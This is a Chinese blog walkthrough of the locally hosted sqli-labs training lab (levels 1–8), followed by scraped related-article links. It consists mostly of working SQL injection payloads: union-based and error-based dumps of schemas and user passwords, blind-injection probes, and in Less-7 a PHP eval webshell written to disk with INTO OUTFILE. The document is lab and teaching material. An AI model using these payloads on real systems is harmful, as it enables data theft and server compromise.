这是抄袭你们  铃兰师姐总结的,尽管她很不情愿。

(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)

less-1:

1、获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1

Your Login name:2

Your Password:security

当前数据库名:security

2、获取所有数据库名

?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

3、获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

//0x7365637572697479  为数据库名(security)的16进制形式

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

数据库security中的表名:emails,referers,uagents,users

4、获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

//0x7573657273 表名:users

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1

Your Login name:2

Your Password:id,username,password

列名:id,username,password

5、获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

//0X7c:空格

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

6、读取数据库路径/获取安装路径

http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\

mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12

Less-2:

1、获取列数:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column '4' in 'order clause'

(共有三列)

2、获取数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' ' union select  1,2,(select database())--+

("id="后面为两个单引号)

SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

数据库:security

3、获取所有数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' '

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名称:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

4、获取表名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

表0x7365637572697479(security)中的表有:emails,referers,uagents,users

5、获取列名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

Your Login name:2

Your Password:id,username,password

数据库security中表users的列名称:id,username,password

6、获取表中数据:

http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Less-3

1.获取列数:

http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+

SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1

Unknown column '4' in 'order clause'

2.@@datadir 读取数据库路径;@@basedir  获取mysql安装路径

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

之后方法类似less-1和less-2!!!

Less-4

1、获取列数:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column '4' in 'order clause'

2、获取数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3、所有数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4、获取表名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5、获取列名:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6、获取数据

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

Less-5:(二分法)

1.获取列数:

http://localhost/sqli-labs-master/less-5/?id=' order by 4--+

共四列: Unknown column '4' in 'order clause'

2、报错得到数据库的个数:

http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~11~~:~~1' for key 'group_key'

==>>共十一个数据库

2.报错得到数据库名:

http://localhost/sqli-labs-master/less-5/

?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~security~~:~~1' for key 'group_key'

==>第九个数据库名为 security

3.报错得到表名:

首先得到表的个数:

/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'

共有四个表

依次得到表的名字:

?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry '~~:~~users~~:~~1' for key 'group_key'

2.获取数据库版本号:

http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+

left(string,n)函数:提取字符串string左边的n个字符。

3.利用length()获取数据库长度:

http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+

数据名长度为8;

4.奇怪:

http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+

结果:FUNCTION security.db does not exist

5.获取数据库名字:使用二分法获取其各个字母

http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+

第一个字母为s;

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

前两个字母为se;

依次类推。。。

6.获取数据库security 数据库的第一表的第一个字符:

首先得出数据库的第一个表的长度:

http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

长度为6;

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema='security' limit 0,1),1,1))>101--+

第一个字母为e;

/Less-5/?id=1' and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+

Less-7 :

1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

less-8:

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

首先要记得常见的ASCII,A:65,Z:90 a:97,z:122,  0:48, 9:57

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码

ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0

ps:(你们铃兰师姐会持续更新的)

sqli-libs的更多相关文章

  1. sqli篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较 ...

  2. 编译gtk+程序报错gcc: pkg-config --cflags --libs gtk+-2.0: 没有那个文件或目录

    第一次接触gtk+.在网上搜罗良一番,装好相应的库后,编写了第一hello程序.在编译时输入以下命令:gcc -o hello hello.c 'pkg-config --cflags --libs ...

  3. Play libs

    The play.libs package contains several useful libraries that will help you to achieve common program ...

  4. Android中libs目录下armeabi和armeabi-v7a的区别

    armeabi默认选项,支持基于 ARM* v5TE 的设备支持软浮点运算(不支持硬件辅助的浮点计算)支持所有 ARM* 设备 armeabi-v7a支持基于 ARM* v7 的设备支持硬件 FPU ...

  5. SQLi filter evasion cheat sheet (MySQL)

    This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 y ...

  6. python INFO: Can't locate Tcl/Tk libs and/or headers

    安装opencv的时候遇到这个错误: python INFO: Can't locate Tcl/Tk libs and/or headers 参考如下文章解决这个问题: http://www.ver ...

  7. 如何为libs目录下的jar包关联源代码

    以前,我们可以为lib目录下的jar包关联源代码,但是现在似乎不行了. 下面是一篇讲述此问题解决方法的文章: How to attach javadoc or sources to jars in l ...

  8. Makefile选项CFLAGS,LDFLAGS,LIBS

    CFLAGS 表示用于 C 编译器的选项, CXXFLAGS 表示用于 C++ 编译器的选项.这两个变量实际上涵盖了编译和汇编两个步骤. CFLAGS: 指定头文件(.h文件)的路径,如:CFLAGS ...

  9. Android studio libs目录

    Android studio libs目录: 关于Android studio libs目录,Android studio 已经为我们自动生成了,如果默认 是看不到默认Libs目录的,点击红色按钮地方 ...

  10. 写你自己 android 多通道打包工具 可以包libs和.so文件

    android上传应用程序,需要区分各个信道. 通常更改配置文件中的一个通道id,假设有多个通道,手动更改并生成apk这将是非常麻烦的,及增加误差的概率. 在这个课堂上分享一个打包工具.也可在网上类似 ...

随机推荐

  1. DevOps之内容分发网络CDN

    唠叨话 关于德语噢屁事的知识点,仅提供专业性的精华汇总,具体知识点细节,参考教程网址,如需帮助,请留言. <内容分发网络CDN(Content Delivery Network)> 关于虚 ...

  2. Mac使用nginx+rtmp服务器

    一.安装Homebrow 已经安装了brow的可以直接跳过这一步.执行命令 ruby -e "$(curl -fsSL https://raw.githubusercontent.com/H ...

  3. 原生js反转字符串

    //直接操作 var str='nama';var rts=str.split('').reverse().join(''); //String上拓展方法String.prototype.revers ...

  4. 案例:AWR手工创建快照失败,SYSAUX表空间剩余不足处理

    案例:AWR手工创建快照失败,SYSAUX表空间剩余不足处理 版本:Oracle 11.2.0.4 RAC 问题现象:AWR手工创建快照失败,SYSAUX表空间剩余不足. 1. 查看SYSAUX表空间 ...

  5. [在线Demo]使用Hibernate多租户实现SaaS服务

    上一篇文章 基于Hibernate实现多租户(Multi-Tendency)功能简单介绍了利用Hibernate的多租户功能提供SaaS服务的方法,但其中有很多不足,后来都得到了解决. 我尝试过抽取实 ...

  6. jQuery在项目中的应用

    版权声明:本文为博主原创文章,未经博主允许不得转载.(转载需注明出处 http://www.cnblogs.com/yanfei1819/p/7743661.html) [摘要]   最近在项目中应用 ...

  7. LeetCode 543. Diameter of Binary Tree (二叉树的直径)

    Given a binary tree, you need to compute the length of the diameter of the tree. The diameter of a b ...

  8. 基于 webpack 的 chrome 扩展开发探索

    起 最近利用闲暇时间在进行一款 chrome 扩展 V2EX-HELPER 的开发(如果巧遇 V 友欢迎试用),今天把它彻底改成了用 webpack 打包依赖的模式,不由得感概 webpack 的强大 ...

  9. jvm - 垃圾回收

    jvm - 垃圾回收 注意 : 本系列文章为学习系列,部分内容会取自相关书籍或者网络资源,在文章中间和末尾处会有标注 垃圾回收的意义 它使得java程序员不再时时刻刻的关注内存管理方面的工作. 垃圾回 ...

  10. velocity的基础使用

    velocity的基本使用要求:掌握jsp的jstl技术,因为velocity的用法和jstl非常相似.语法上差别不大,但是velocity的示例明显比jstl少,解释也少,所以使用velocity必 ...